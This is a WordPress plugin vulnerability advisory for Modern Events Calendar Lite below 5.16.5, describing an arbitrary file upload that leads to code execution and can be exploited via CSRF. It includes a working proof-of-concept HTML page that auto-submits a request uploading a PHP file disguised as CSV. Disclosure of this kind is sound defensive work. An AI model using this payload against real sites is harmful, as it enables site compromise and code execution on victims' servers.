WordPress Plugin Vulnerabilities
Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE
Description
The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. The issue could also be exploited via a CRSF attack, as such check was also missing.
Proof of Concept
https://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing <html> <body onload="submitRequest();"> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=MEC-ix&tab=MEC-import", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------132370916641787807752589698875"); xhr.withCredentials = true; var body = "-----------------------------132370916641787807752589698875\r\n" + "Content-Disposition: form-data; name=\"feed\"; filename=\"aa.php\"\r\n" + "Content-Type: text/csv\r\n" + "\r\n" + "\x3c?php echo \'FAILED\'; ?\x3e\n" + "\r\n" + "-----------------------------132370916641787807752589698875\r\n" + "Content-Disposition: form-data; name=\"mec-ix-action\"\r\n" + "\r\n" + "import-start-bookings\r\n" + "-----------------------------132370916641787807752589698875--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> </body> </html> Uploaded file will be at /wp-content/uploads/aa.php
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
Submitter
khanh
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-01-29 (about 3 years ago)
Added
2021-01-29 (about 3 years ago)
Last Updated
2021-02-01 (about 3 years ago)